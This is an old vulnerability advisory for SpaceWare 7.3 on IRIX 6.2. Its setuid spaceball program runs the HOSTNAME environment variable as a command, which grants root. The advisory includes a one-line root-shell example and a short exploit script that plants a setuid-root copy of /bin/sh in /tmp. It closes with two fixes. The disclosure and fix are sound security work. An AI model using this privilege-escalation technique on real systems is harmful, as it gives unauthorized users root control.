COMMAND

    SpaceWare 7.3 v1.0

SYSTEMS AFFECTED

    IRIX 6.2 (others?)

PROBLEM

    J.A. Gutierrez found following.  If you're playing with SpaceBall,
    you'll find  out now  how can  you play  even more.   You can  use
    HOSTNAME for any command you want to run as root, like:

    echo 6 | HOSTNAME="`which xterm` -e `which sh`" /usr/local/SpaceWare/spaceball

Exploit follows:

    #!/bin/sh

    SWDIR=/usr/local/SpaceWare
    cp /bin/sh /tmp/sh

    echo 6 | HOSTNAME="/bin/chmod 4755 /tmp/sh" \
    $SWDIR/spaceball > /dev/null 2>&1
    echo 6 | HOSTNAME="/bin/chown root /tmp/sh" \
    $SWDIR/spaceball > /dev/null 2>&1

    /tmp/sh

SOLUTION

    a) rm (since spaceball.sh does lots of nasty things, like  running
       spaceball demos as root, probably this is the best solution)

    b) set  HOSTNAME=/usr/bsd/hostname in  the "Utilities"  section of
       $SWDIR/spaceball.sh